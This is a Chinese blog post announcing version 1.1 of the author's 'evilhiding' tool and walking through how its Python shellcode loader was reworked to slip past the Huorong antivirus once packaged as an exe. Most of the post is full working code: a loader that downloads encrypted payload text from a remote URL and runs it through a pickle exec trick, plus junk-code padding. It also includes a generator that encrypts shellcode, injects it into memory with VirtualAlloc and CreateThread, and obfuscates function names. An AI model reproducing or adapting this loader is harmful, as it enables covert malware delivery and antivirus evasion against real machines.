记一次有趣的免杀探索

coleak2023-11-02 17:57

文章目录

前记

evilhiding昨天被提issue不能绕过火绒了,于是今天更新了evilhiding v1.1,已经可以继续免杀了。

期待各位的stars,项目地址如下:

复制代码 
https://github.com/coleak2021/evilhiding

查杀排查

直接python运行b.py发现未被查杀,且可正常上线,但是通过pyinstaller打包为exe后发现被火绒查杀,因此打算对源代码进行修改来绕过火绒

于是对b.py关键部分分别打包检查,发现均未被查杀

加载器

复制代码 
import pickle,base64,requests,ctypes
from cryptography.fernet import Fernet

url=''
def O7867890(sectr):
    KEY=b'Lo8QurfIObo62aKQsQjnzAocsnrrIkTsJewRJLLKAsA='
    fernet = Fernet(KEY)
    destr = fernet.decrypt(sectr).decode()
    class A(object):
        def __reduce__(self):
            return (exec, (destr,))

    ret = pickle.dumps(A())
    ret_base64 = base64.b64encode(ret)
    ret_decode = base64.b64decode(ret_base64)
    pickle.loads(ret_decode)

执行器

复制代码 
def O1674418():
    try:
        r=requests.get(url)
        a = r.status_code
    except:
        a = 404
        pass

    if a == 200:
        O7867890(r.text)
    else:
        pass

if __name__ == '__main__':
    exec(t1)
    exec(t2)
    O1674418()

花指令

复制代码 
t2 ="""
import base64

st= 'wo gan jue wo ma shang jiu yao bei defender gan diao a ba a bachonogchong chongcong!'.encode()
res= base64.b64encode(st)
aaa= res.decode()
res= base64.b64decode(res)
bbb= res.decode()
   """

t1 ="""
import random

def O4402217(test_arr, low, high):
   i = (low - 1)  
   pivot = test_arr[high]

   for j in range(low, high):
       if test_arr[j] <= pivot:
           i = i + 1
           test_arr[i], test_arr[j] = test_arr[j], test_arr[i]

   test_arr[i + 1], test_arr[high] = test_arr[high], test_arr[i + 1]
   return i + 1


def O7313740(test_arr, low, high):
   if low < high:
       pi = O4402217(test_arr, low, high)
       O7313740(test_arr, low, pi - 1)
       O7313740(test_arr, pi + 1, high)


test_arr= []
for i in range(59999):
   test_arr.append(random.random())
n= len(test_arr)
O7313740(test_arr,0, n - 1)
   """

得出结论:各部分可以分别正常打包,但是火绒对整体进行了特征提取,因此我们只需要将文件结构做修改即可

源码修改

经过测试,最终对b.py修改为如下,此时打包为exe可绕过火绒正常上线

复制代码 
from cryptography.fernet import Fernet
import pickle,base64,requests,ctypes
import random

url=''
def O7867890(sectr):
    KEY=b''
    fernet = Fernet(KEY)
    destr = fernet.decrypt(sectr).decode()
    class A(object):
        def __reduce__(self):
            return (exec, (destr,))
        def say_hello(self):
            exec(bbb)
    a=A()
    a.say_hello()
    ret = pickle.dumps(a)
    ret_base64 = base64.b64encode(ret)
    ret_decode = base64.b64decode(ret_base64)
    pickle.loads(ret_decode)

bbb ="""
import base64
st= 'cccccccccccccccccccooooooooooollllllllllllleeeeeeeeeeeeaaaaaaaaaaaakkkkkkkkk'.encode()
res= base64.b64encode(st)
aaa= res.decode()
res= base64.b64decode(res)
bbb= res.decode()
   """

def O1674418():
    try:
        r=requests.get(url)
        a = r.status_code
    except:
        a = 404
        pass

    if a == 200:
        O7867890(r.text)
    else:
        pass

if __name__ == '__main__':
    O1674418()

因此,对main.py生成器修改如下

复制代码 
# -*- coding: utf-8 -*-

import base64
import re,os,time
from cryptography.fernet import Fernet

shellcode = b""
url=''
key = Fernet.generate_key()
fernet = Fernet(key)
enstr = fernet.encrypt(shellcode)
key2 = Fernet.generate_key()
fernet2 = Fernet(key2)
a=f'''
import ctypes
from cryptography.fernet import Fernet
KEY={key}
fernet=Fernet(KEY)
shellcode=fernet.decrypt({enstr})

shellcode = bytearray(shellcode)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_uint64(ptr),
    buf,
    ctypes.c_int(len(shellcode))
)
handle = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_uint64(ptr),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0))
)
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
'''

cccc=f'''
from cryptography.fernet import Fernet
import pickle,base64,requests,ctypes
import random
url=f'{url}'
a=[]
class B():
    def cc(self):
        for i in range(5):
            a.append(i)

def O7303771(sectr):
    global destr
    KEY={key2}
    fernet = Fernet(KEY)
    destr = fernet.decrypt(sectr).decode()
    aaa(destr)

def aaa(destr):
    class A(object):
        def __reduce__(self):
            return (exec, (destr,))
        def O6294286(self):
            exec(bbb)
    a=A()
    a.O6294286()
    ret = pickle.dumps(a)
    ret_base64 = base64.b64encode(ret)
    ret_decode = base64.b64decode(ret_base64)
    pickle.loads(ret_decode)

bbb ="""
for i in range(100):
    aaa=B()
    aaa.cc()
   """

def O0135984():
    try:
        r=requests.get(url)
        a = r.status_code
    except:
        a = 404
        pass

    if a == 200:
        O7303771(r.text)
    else:
        pass
if __name__ == '__main__':
    O0135984()
'''

def hunxiao():
    openfile = 'content.txt'
    text = open(openfile, encoding='utf-8').read()
    wd_df = re.findall("def (.*?)\\(", text)
    wd_df = list(set(wd_df))
    for i in wd_df:
        if i[0:2] == "__":
            wd_df.remove(i)
        if i == 'super':
            wd_df.remove(i)
    idlist = []
    for i in wd_df:
        idlist.append('O' + str(hash(i))[-7:])

    cs = len(wd_df)
    if cs == len(set(idlist)):
        while cs > 0:
            cs -= 1
            text = text.replace(wd_df[cs] + '(', idlist[cs] + '(')
            text = text.replace('target=' + wd_df[cs], 'target=' + idlist[cs])
            text = text.replace('global ' + wd_df[cs], 'global ' + idlist[cs])
            text = text.replace(', ' + wd_df[cs], ', ' + idlist[cs])
    else:
        print('hash repeat')

    file_save = open('b.py', 'w', encoding='utf-8')
    file_save.write(text)
    file_save.close()

with open('content.txt', 'bw') as f:
    f.write(cccc.encode())
    hunxiao()

with open('a.txt', 'bw') as f:
    f.write(fernet2.encrypt(a.encode()))

with open('content.txt', 'br') as f:
    content=base64.b64encode(f.read())

b = f'''
from cryptography.fernet import Fernet
import pickle,base64,requests,ctypes
import random
cccc={content}
exec(base64.b64decode(cccc).decode())
'''

with open('b.py', 'w', encoding='utf-8') as f:
    f.write(b)

iconame=f'{int (time.time() *1000)}.ico'
with open('coleak.ico',"br") as f:
    cont=f.read()
with open(f'{iconame}',"bw") as f:
    cont+=iconame.encode()
    f.write(cont)
with open('create.py',"br") as f:
    createit=f.read()
exec(createit)

免杀效果测试


相关推荐
2501_91537388几秒前
Redis线程安全深度解析:单线程模型的并发智慧
数据库·redis·安全
AI蜗牛之家1 小时前
Qwen系列之Qwen3解读:最强开源模型的细节拆解
人工智能·python
C++ 老炮儿的技术栈1 小时前
UDP 与 TCP 的区别是什么?
开发语言·c++·windows·算法·visual studio
whyeekkk1 小时前
python打卡第48天
开发语言·python
恰薯条的屑海鸥3 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十五期-URL重定向模块)
学习·安全·web安全·渗透测试·网络安全学习
Eiceblue4 小时前
Python读取PDF:文本、图片与文档属性
数据库·python·pdf
Tipray20064 小时前
让敏感数据在流转与存储中始终守护在安全范围
安全
weixin_527550404 小时前
初级程序员入门指南
javascript·python·算法
程序员的世界你不懂4 小时前
Appium+python自动化(十)- 元素定位
python·appium·自动化
前端页面仔5 小时前
易语言是什么?易语言能做什么?
开发语言·安全
热门推荐
01【图像处理与机器视觉】XJTU期末考点02从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑03KGG转MP3工具|非KGM文件|解密音频04海康Visionmaster-常见问题排查方法-启动阶段05YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】06【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!07SSv2数据集08Coze扣子平台完整体验和实践(附国内和国际版对比)09DeepSeek各版本说明与优缺点分析10【云原生】动态资源分配(DRA)深度洞察报告